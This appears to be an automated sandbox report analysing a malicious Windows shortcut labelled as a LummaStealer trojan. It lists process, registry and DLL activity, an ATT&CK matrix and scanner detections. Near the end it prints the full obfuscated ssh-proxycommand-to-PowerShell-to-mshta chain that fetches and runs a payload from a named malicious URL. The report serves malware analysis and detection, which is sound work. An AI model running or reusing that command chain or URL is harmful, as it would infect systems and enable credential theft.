Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: imgutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: anov3mrRa1.lnk

LNK file: ..\..\..\Windows\System32\OpenSSH\ssh.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\System32\mshta.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\System32\mshta.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2085	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1338	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1089	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 483	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window / User API: threadDelayed 7390	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040	Thread sleep count: 2085 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040	Thread sleep count: 1338 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 608	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1112	Thread sleep count: 1089 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4844	Thread sleep count: 483 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\mshta.exe{
Source: mshta.exe, 00000005.00000002.2817910967.000001F35BDAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2817910967.000001F35BE42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ssh.exe, 00000000.00000002.2817656658.000002CF6CAA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -c 'mshta'.insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" .

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
anov3mrRa1.lnk	37%	Virustotal		Browse
anov3mrRa1.lnk	34%	ReversingLabs	Shortcut.Trojan.LummaStealerLNK

Source	Detection	Scanner	Label
https://docshare.icu/w	100%	Avira URL Cloud	malware
https://docshare.icu/G	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4m	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4...a	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4V	100%	Avira URL Cloud	malware
https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4p	100%	Avira URL Cloud	malware
